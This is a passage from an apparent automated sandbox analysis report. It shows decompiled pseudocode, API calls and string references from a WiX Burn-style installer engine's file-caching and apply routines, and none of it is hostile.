                                                                                                                                                                  				WCHAR* _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t25;
                                                                                                                                                                  				void* _t31;
                                                                                                                                                                  				signed short _t51;
                                                                                                                                                                  				signed short _t54;
                                                                                                                                                                  				signed short _t57;
                                                                                                                                                                  				signed short _t62;
                                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                                  				WCHAR* _t67;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				signed int _t91;
                                                                                                                                                                  
                                                                                                                                                                  				_t25 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t25 ^ _t91;
                                                                                                                                                                  				_t67 = _a12;
                                                                                                                                                                  				_t66 = _a16;
                                                                                                                                                                  				_t76 = _a4;
                                                                                                                                                                  				_v24 = _a8;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v32 = _a4;
                                                                                                                                                                  				_v28 = _t67;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t75 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0);
                                                                                                                                                                  				if(_t75 != 0xffffffff) {
                                                                                                                                                                  					_t31 = E00436FAF(_t67, _t76, 0, 0, 0, 0);
                                                                                                                                                                  					_t77 = _t31;
                                                                                                                                                                  					if(_t31 >= 0) {
                                                                                                                                                                  						_t12 = _t66 + 8; // 0x1066de8
                                                                                                                                                                  						_t77 = E0043659F(_v32, _t75,  *_t12, 0, 0);
                                                                                                                                                                  						if(_t77 >= 0) {
                                                                                                                                                                  							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_t17 = _t66 + 0x18; // 0x5dc18bc8
                                                                                                                                                                  								if(SetFilePointerEx(_t75,  *_t17, 0, 0) != 0) {
                                                                                                                                                                  									_t18 = _t66 + 0x24; // 0x401129
                                                                                                                                                                  									if(E004373A3(0, _t75, _t18, 4) >= 0) {
                                                                                                                                                                  										_push(0);
                                                                                                                                                                  										_t19 = _t66 + 0x1c; // 0x550008c2
                                                                                                                                                                  										if(SetFilePointerEx(_t75,  *_t19, 0, 0) != 0) {
                                                                                                                                                                  											_t20 = _t66 + 0x28; // 0x40112d
                                                                                                                                                                  											_t77 = E004373A3(0, _t75, _t20, 4);
                                                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                                                  												goto L10;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t21 = _t66 + 0x2c; // 0x401131
                                                                                                                                                                  												_t77 = E004373A3(0, _t75, _t21, 4);
                                                                                                                                                                  												if(_t77 < 0) {
                                                                                                                                                                  													goto L10;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push(0);
                                                                                                                                                                  													_t22 = _t66 + 0x20; // 0xec83ec8b
                                                                                                                                                                  													if(SetFilePointerEx(_t75,  *_t22, 0, 0) != 0) {
                                                                                                                                                                  														_t77 = E004373A3(0, _t75,  &_v20, 0xc);
                                                                                                                                                                  														if(_t77 < 0) {
                                                                                                                                                                  															_push("Failed to zero out original data offset.");
                                                                                                                                                                  															goto L19;
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t51 = GetLastError();
                                                                                                                                                                  														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														E004300D9(0x80004005, "cache.cpp", 0x5ec, _t77);
                                                                                                                                                                  														_push("Failed to seek to original data in exe burn section header.");
                                                                                                                                                                  														goto L19;
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t54 = GetLastError();
                                                                                                                                                                  											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											E004300D9(0x80004005, "cache.cpp", 0x5df, _t77);
                                                                                                                                                                  											_push("Failed to seek to signature table in exe header.");
                                                                                                                                                                  											goto L19;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										L10:
                                                                                                                                                                  										_push("Failed to update signature offset.");
                                                                                                                                                                  										goto L19;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t57 = GetLastError();
                                                                                                                                                                  									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									E004300D9(0x80004005, "cache.cpp", 0x5d5, _t77);
                                                                                                                                                                  									_push("Failed to seek to checksum in exe header.");
                                                                                                                                                                  									L19:
                                                                                                                                                                  									_push(_t77);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(_v28);
                                                                                                                                                                  							E00430A57(_t77, "Failed to copy engine from: %ls to: %ls", _v24);
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E00430A57(_t77, "Failed to seek to beginning of engine file: %ls", _v24);
                                                                                                                                                                  					}
                                                                                                                                                                  					CloseHandle(_t75);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t62 = GetLastError();
                                                                                                                                                                  					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "cache.cpp", 0x5c5,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
                                                                                                                                                                  					E00430A57( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v28);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t77, _v8 ^ _t91, _t75, _t77);
                                                                                                                                                                  			}





















                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,74EDA770,00000000,?,00401105,?,00000000,00000000), ref: 00412104
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401414,00000000,?,?,?,?,00401EA4,?,?), ref: 00412111
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,01066DE8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 004122F3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to seek to original data in exe burn section header., xrefs: 004122CC
                                                                                                                                                                  • Failed to seek to signature table in exe header., xrefs: 0041225D
                                                                                                                                                                  • Failed to seek to checksum in exe header., xrefs: 004121F6
                                                                                                                                                                  • Failed to seek to beginning of engine file: %ls, xrefs: 0041216A
                                                                                                                                                                  • cache.cpp, xrefs: 00412135, 004121EC, 00412253, 004122C2
                                                                                                                                                                  • Failed to update signature offset., xrefs: 00412212
                                                                                                                                                                  • Failed to zero out original data offset., xrefs: 004122E5
                                                                                                                                                                  • Failed to create engine file at path: %ls, xrefs: 00412142
                                                                                                                                                                  • Failed to copy engine from: %ls to: %ls, xrefs: 00412199
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cache.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                  			E00410C48(signed short _a4, signed int _a8) {
                                                                                                                                                                  				signed short _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				signed short _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				signed short _v28;
                                                                                                                                                                  				signed short _v32;
                                                                                                                                                                  				signed short _v36;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				signed short* _v44;
                                                                                                                                                                  				char* _v48;
                                                                                                                                                                  				void _v52;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				intOrPtr* _t100;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				intOrPtr* _t111;
                                                                                                                                                                  				void* _t122;
                                                                                                                                                                  				signed short _t136;
                                                                                                                                                                  				signed short _t139;
                                                                                                                                                                  				signed short _t146;
                                                                                                                                                                  				signed short _t151;
                                                                                                                                                                  				void* _t160;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  				signed short _t166;
                                                                                                                                                                  				signed short _t169;
                                                                                                                                                                  
                                                                                                                                                                  				_t146 = _a4;
                                                                                                                                                                  				_v32 =  *(_t146 + 0x3f0);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_push(0x2000012c);
                                                                                                                                                                  				_push(2);
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_a4 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				E00402003();
                                                                                                                                                                  				_t15 = _t146 + 0xb8; // 0xb8
                                                                                                                                                                  				_t162 = _t15;
                                                                                                                                                                  				if(E00408682(_t15,  &_v40) >= 0) {
                                                                                                                                                                  					_t16 = _t146 + 0x2a8; // 0x2a8
                                                                                                                                                                  					E0042258B(__eflags, _t162, _t16);
                                                                                                                                                                  					_t100 =  *((intOrPtr*)(_t146 + 0xc8));
                                                                                                                                                                  					_t150 =  *_t100;
                                                                                                                                                                  					_t166 = E00408843(_t162, 1,  *((intOrPtr*)( *_t100 + 0x60))(_t100));
                                                                                                                                                                  					__eflags = _t166;
                                                                                                                                                                  					if(_t166 >= 0) {
                                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t146 + 0x30)) - 3;
                                                                                                                                                                  						if( *((intOrPtr*)(_t146 + 0x30)) != 3) {
                                                                                                                                                                  							_push( &_v12);
                                                                                                                                                                  							_push(0);
                                                                                                                                                                  							_t166 = E004223EF();
                                                                                                                                                                  							__eflags = _t166;
                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                  								E004223E3(_t104);
                                                                                                                                                                  								_t24 = _t146 + 0x88; // 0x88
                                                                                                                                                                  								_t163 = _t24;
                                                                                                                                                                  								 *(_t146 + 0xf0) = _a8;
                                                                                                                                                                  								_t166 = E004225BC(__eflags, _t24);
                                                                                                                                                                  								__eflags = _t166;
                                                                                                                                                                  								if(_t166 >= 0) {
                                                                                                                                                                  									_t151 = 0;
                                                                                                                                                                  									__eflags =  *(_t146 + 0x418);
                                                                                                                                                                  									if( *(_t146 + 0x418) != 0) {
                                                                                                                                                                  										L18:
                                                                                                                                                                  										_t30 = _t146 + 0x468; // 0x468
                                                                                                                                                                  										_t108 = _t30;
                                                                                                                                                                  										__eflags =  *_t108 - _t151;
                                                                                                                                                                  										if( *_t108 != _t151) {
                                                                                                                                                                  											L22:
                                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t146 + 0x3e4)) - _t151;
                                                                                                                                                                  											if( *((intOrPtr*)(_t146 + 0x3e4)) == _t151) {
                                                                                                                                                                  												L28:
                                                                                                                                                                  												__eflags =  *(_t146 + 0x3e8);
                                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                                  													L32:
                                                                                                                                                                  													__eflags =  *(_t146 + 0x428);
                                                                                                                                                                  													if( *(_t146 + 0x428) == 0) {
                                                                                                                                                                  														_t164 = _v16;
                                                                                                                                                                  														L41:
                                                                                                                                                                  														__eflags =  *(_t146 + 0x438);
                                                                                                                                                                  														if(__eflags != 0) {
                                                                                                                                                                  															_t166 = E0042229D(__eflags, _t146, _t164,  &_v24,  &_v32,  &_v8,  &_v20,  &_a4);
                                                                                                                                                                  															_t63 = _t146 + 0xb8; // 0xb8
                                                                                                                                                                  															_t108 = E004087D4(_t63, _t166);
                                                                                                                                                                  														}
                                                                                                                                                                  														__eflags = _t164;
                                                                                                                                                                  														if(_t164 == 0) {
                                                                                                                                                                  															L46:
                                                                                                                                                                  															__eflags = _t166;
                                                                                                                                                                  															if(_t166 >= 0) {
                                                                                                                                                                  																__eflags = _v8;
                                                                                                                                                                  																if(_v8 == 0) {
                                                                                                                                                                  																	__eflags = _v20;
                                                                                                                                                                  																	if(_v20 == 0) {
                                                                                                                                                                  																		__eflags = _a4 - 2;
                                                                                                                                                                  																		if(_a4 != 2) {
                                                                                                                                                                  																			__eflags =  *(_t146 + 0x448);
                                                                                                                                                                  																			if( *(_t146 + 0x448) != 0) {
                                                                                                                                                                  																				_t69 = _t146 + 0x3d8; // 0x3d8
                                                                                                                                                                  																				_t70 = _t146 + 0xb8; // 0xb8
                                                                                                                                                                  																				_t108 = E00422274(_t70, _t69,  *((intOrPtr*)(_t146 + 0x47c)));
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L52;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t108 = E00410BA1(_t151, _t164);
                                                                                                                                                                  															__eflags = _t166;
                                                                                                                                                                  															if(_t166 < 0) {
                                                                                                                                                                  																L52:
                                                                                                                                                                  																__eflags = _v28;
                                                                                                                                                                  																if(_v28 == 0) {
                                                                                                                                                                  																	L62:
                                                                                                                                                                  																	__eflags = _v36;
                                                                                                                                                                  																	if(_v36 != 0) {
                                                                                                                                                                  																		_t108 = E00416171(_t151,  *((intOrPtr*)(_t146 + 0x47c)));
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L64;
                                                                                                                                                                  																}
                                                                                                                                                                  																__eflags = _v32;
                                                                                                                                                                  																if(_v32 != 0) {
                                                                                                                                                                  																	L56:
                                                                                                                                                                  																	_t151 = 1;
                                                                                                                                                                  																	__eflags = 1;
                                                                                                                                                                  																	L57:
                                                                                                                                                                  																	__eflags = _t166;
                                                                                                                                                                  																	if(_t166 < 0) {
                                                                                                                                                                  																		L60:
                                                                                                                                                                  																		_t122 = 1;
                                                                                                                                                                  																		__eflags = 1;
                                                                                                                                                                  																		L61:
                                                                                                                                                                  																		_t108 = E004225F7(_t160, _t146, _t122, _t151, _v20, _a4);
                                                                                                                                                                  																		goto L62;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	__eflags = _v8;
                                                                                                                                                                  																	if(_v8 != 0) {
                                                                                                                                                                  																		goto L60;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t122 = 0;
                                                                                                                                                                  																	goto L61;
                                                                                                                                                                  																}
                                                                                                                                                                  																__eflags =  *(_t146 + 0x3f4);
                                                                                                                                                                  																if( *(_t146 + 0x3f4) != 0) {
                                                                                                                                                                  																	goto L56;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t151 = 0;
                                                                                                                                                                  																goto L57;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t166 = _t108;
                                                                                                                                                                  															goto L46;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  													_v48 =  &_v24;
                                                                                                                                                                  													_v44 =  &_v8;
                                                                                                                                                                  													_v52 = _t146;
                                                                                                                                                                  													_t164 = CreateThread(0, 0, E0040FCB4,  &_v52, 0, 0);
                                                                                                                                                                  													_v16 = _t164;
                                                                                                                                                                  													__eflags = _t164;
                                                                                                                                                                  													if(_t164 != 0) {
                                                                                                                                                                  														__eflags =  *(_t146 + 0x3b8);
                                                                                                                                                                  														if( *(_t146 + 0x3b8) != 0) {
                                                                                                                                                                  															goto L41;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t166 = E00410BA1(_t151, _t164);
                                                                                                                                                                  														__eflags = _t166;
                                                                                                                                                                  														if(_t166 >= 0) {
                                                                                                                                                                  															_t108 = CloseHandle(_t164);
                                                                                                                                                                  															_t164 = 0;
                                                                                                                                                                  															_v16 = 0;
                                                                                                                                                                  															goto L41;
                                                                                                                                                                  														}
                                                                                                                                                                  														_push("Failed while caching, aborting execution.");
                                                                                                                                                                  														L38:
                                                                                                                                                                  														_t108 = E00430A57();
                                                                                                                                                                  														_t151 = _t166;
                                                                                                                                                                  														goto L52;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t136 = GetLastError();
                                                                                                                                                                  													__eflags = _t136;
                                                                                                                                                                  													_t169 =  <=  ? _t136 : _t136 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  													__eflags = _t169;
                                                                                                                                                                  													_t166 =  >=  ? 0x80004005 : _t169;
                                                                                                                                                                  													E004300D9(0x80004005, "core.cpp", 0x24e, _t166);
                                                                                                                                                                  													_push("Failed to create cache thread.");
                                                                                                                                                                  													goto L38;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t166 = E004223F4(_t146, _t151, _t160, __eflags, _t146);
                                                                                                                                                                  												__eflags = _t166;
                                                                                                                                                                  												if(_t166 >= 0) {
                                                                                                                                                                  													_v28 = 1;
                                                                                                                                                                  													goto L32;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to register bundle.");
                                                                                                                                                                  												_t108 = E00430A57();
                                                                                                                                                                  												_t151 = _t166;
                                                                                                                                                                  												goto L62;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t139 = E004114D0(_t146,  *(_t146 + 0xf0));
                                                                                                                                                                  											__eflags = _t139;
                                                                                                                                                                  											if(_t139 >= 0) {
                                                                                                                                                                  												__eflags =  *(_t146 + 0x3b4);
                                                                                                                                                                  												_t166 = E004160A6( *(_t146 + 0x3b4),  *((intOrPtr*)(_t146 + 0x47c)), _t163,  *((intOrPtr*)(_t146 + 0x3d8)),  *((intOrPtr*)(_t146 + 0x45c)), 0 |  *(_t146 + 0x3b4) == 0x00000000);
                                                                                                                                                                  												__eflags = _t166;
                                                                                                                                                                  												if(_t166 >= 0) {
                                                                                                                                                                  													_v36 = 1;
                                                                                                                                                                  													goto L28;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Another per-machine setup is already executing.");
                                                                                                                                                                  												goto L11;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to elevate.");
                                                                                                                                                                  											goto L11;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t166 = _t108;
                                                                                                                                                                  										__eflags = _t166;
                                                                                                                                                                  										if(_t166 >= 0) {
                                                                                                                                                                  											_t151 = 0;
                                                                                                                                                                  											__eflags = 0;
                                                                                                                                                                  											goto L22;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to cache engine to working directory.");
                                                                                                                                                                  										goto L11;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *(_t146 + 0x428);
                                                                                                                                                                  									if( *(_t146 + 0x428) != 0) {
                                                                                                                                                                  										goto L18;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *(_t146 + 0x438);
                                                                                                                                                                  									if( *(_t146 + 0x438) != 0) {
                                                                                                                                                                  										goto L18;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *(_t146 + 0x448);
                                                                                                                                                                  									if( *(_t146 + 0x448) != 0) {
                                                                                                                                                                  										goto L18;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push(0xa000017c);
                                                                                                                                                                  									_push(2);
                                                                                                                                                                  									_t108 = E00402003();
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to set initial apply variables.");
                                                                                                                                                                  									L11:
                                                                                                                                                                  									_push(_t166);
                                                                                                                                                                  									_t108 = E00430A57();
                                                                                                                                                                  									L12:
                                                                                                                                                                  									L64:
                                                                                                                                                                  									_t79 = _t146 + 0xb8; // 0xb8
                                                                                                                                                                  									_t162 = _t79;
                                                                                                                                                                  									goto L65;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Another per-user setup is already executing.");
                                                                                                                                                                  								goto L2;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t166 = 0x8007015e;
                                                                                                                                                                  							_a4 = 1;
                                                                                                                                                                  							_t108 = E004089F8(_t150,  *((intOrPtr*)(_t146 + 0xc8)), 5, 0, 0x8007015e, 0, 0x10, 0);
                                                                                                                                                                  							goto L65;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E004300D9(_t102, "core.cpp", 0x20c, _t166);
                                                                                                                                                                  						_push("UX aborted apply begin.");
                                                                                                                                                                  						goto L2;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Engine cannot start apply because it is busy with another action.");
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_push(_t166);
                                                                                                                                                                  					_t108 = E00430A57();
                                                                                                                                                                  					L65:
                                                                                                                                                                  					 *(_t146 + 0xf0) =  *(_t146 + 0xf0) & 0x00000000;
                                                                                                                                                                  					E004225EB(_t108);
                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                  						ReleaseMutex(_v12);
                                                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v40 != 0) {
                                                                                                                                                                  						E00408728(_t162);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t110 = _v16;
                                                                                                                                                                  					if(_t110 != 0) {
                                                                                                                                                                  						CloseHandle(_t110);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(_a4);
                                                                                                                                                                  					_t111 =  *((intOrPtr*)(_t146 + 0xc8));
                                                                                                                                                                  					_push(_t166);
                                                                                                                                                                  					_push(_t111);
                                                                                                                                                                  					if( *((intOrPtr*)( *_t111 + 0xc8))() == 0x66) {
                                                                                                                                                                  						 *(_t146 + 0x18) = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(E0040E33B( *(_t146 + 0x18)));
                                                                                                                                                                  					_push(E0040E8CE(_a4));
                                                                                                                                                                  					E00402003(2, 0x2000018f, _t166);
                                                                                                                                                                  					return _t166;
                                                                                                                                                                  				}
                                                                                                                                                                  			}




























                                                                                                                                                                  0x00410f51
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f57
                                                                                                                                                                  0x00410f59
                                                                                                                                                                  0x00410f5d
                                                                                                                                                                  0x00410f5f
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f65
                                                                                                                                                                  0x00410f6c
                                                                                                                                                                  0x00410f74
                                                                                                                                                                  0x00410f7b
                                                                                                                                                                  0x00410f82
                                                                                                                                                                  0x00410f82
                                                                                                                                                                  0x00410f6c
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f5d
                                                                                                                                                                  0x00410f57
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f43
                                                                                                                                                                  0x00410f44
                                                                                                                                                                  0x00410f49
                                                                                                                                                                  0x00410f4b
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f8b
                                                                                                                                                                  0x00410fc2
                                                                                                                                                                  0x00410fc2
                                                                                                                                                                  0x00410fc6
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fc6
                                                                                                                                                                  0x00410f8d
                                                                                                                                                                  0x00410f91
                                                                                                                                                                  0x00410fa0
                                                                                                                                                                  0x00410fa2
                                                                                                                                                                  0x00410fa2
                                                                                                                                                                  0x00410fa3
                                                                                                                                                                  0x00410fa3
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fb1
                                                                                                                                                                  0x00410fb3
                                                                                                                                                                  0x00410fb3
                                                                                                                                                                  0x00410fb4
                                                                                                                                                                  0x00410fbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fbd
                                                                                                                                                                  0x00410fa7
                                                                                                                                                                  0x00410fab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fad
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410fad
                                                                                                                                                                  0x00410f93
                                                                                                                                                                  0x00410f9a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f9c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f9c
                                                                                                                                                                  0x00410f4d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f4d
                                                                                                                                                                  0x00410f41
                                                                                                                                                                  0x00410e75
                                                                                                                                                                  0x00410e7d
                                                                                                                                                                  0x00410e8d
                                                                                                                                                                  0x00410e96
                                                                                                                                                                  0x00410e98
                                                                                                                                                                  0x00410e9b
                                                                                                                                                                  0x00410e9d
                                                                                                                                                                  0x00410ed4
                                                                                                                                                                  0x00410edb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ee3
                                                                                                                                                                  0x00410ee5
                                                                                                                                                                  0x00410ee7
                                                                                                                                                                  0x00410efc
                                                                                                                                                                  0x00410f02
                                                                                                                                                                  0x00410f04
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410f04
                                                                                                                                                                  0x00410ee9
                                                                                                                                                                  0x00410eee
                                                                                                                                                                  0x00410eef
                                                                                                                                                                  0x00410ef5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ef5
                                                                                                                                                                  0x00410e9f
                                                                                                                                                                  0x00410eae
                                                                                                                                                                  0x00410eb0
                                                                                                                                                                  0x00410eb8
                                                                                                                                                                  0x00410eba
                                                                                                                                                                  0x00410ec8
                                                                                                                                                                  0x00410ecd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410ecd
                                                                                                                                                                  0x00410e44
                                                                                                                                                                  0x00410e46
                                                                                                                                                                  0x00410e48
                                                                                                                                                                  0x00410e5c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e5c
                                                                                                                                                                  0x00410e4a
                                                                                                                                                                  0x00410e50
                                                                                                                                                                  0x00410e56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e56
                                                                                                                                                                  0x00410de5
                                                                                                                                                                  0x00410dec
                                                                                                                                                                  0x00410dee
                                                                                                                                                                  0x00410dfc
                                                                                                                                                                  0x00410e1e
                                                                                                                                                                  0x00410e20
                                                                                                                                                                  0x00410e22
                                                                                                                                                                  0x00410e2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e2e
                                                                                                                                                                  0x00410e24
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410e24
                                                                                                                                                                  0x00410df0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410df0
                                                                                                                                                                  0x00410dc7
                                                                                                                                                                  0x00410dc9
                                                                                                                                                                  0x00410dcb
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410dd4
                                                                                                                                                                  0x00410dcd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410dcd
                                                                                                                                                                  0x00410d7a
                                                                                                                                                                  0x00410d80
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d82
                                                                                                                                                                  0x00410d88
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d8a
                                                                                                                                                                  0x00410d90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d92
                                                                                                                                                                  0x00410d97
                                                                                                                                                                  0x00410d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410d5e
                                                                                                                                                                  0x00410d5e
                                                                                                                                                                  0x00410d63
                                                                                                                                                                  0x00410d63
                                                                                                                                                                  0x00410d64
                                                                                                                                                                  0x00410d69
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00410fd3
                                                                                                                                                                  0x00410fd3

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408682: EnterCriticalSection.KERNEL32(000000D0,00000000,000000B8,00000000,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 00408691
                                                                                                                                                                    • Part of subcall function 00408682: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004086A0
                                                                                                                                                                    • Part of subcall function 00408682: LeaveCriticalSection.KERNEL32(000000D0,?,0041109A,000000B8,00000000,00000000,00000000,74EDA770), ref: 004086B5
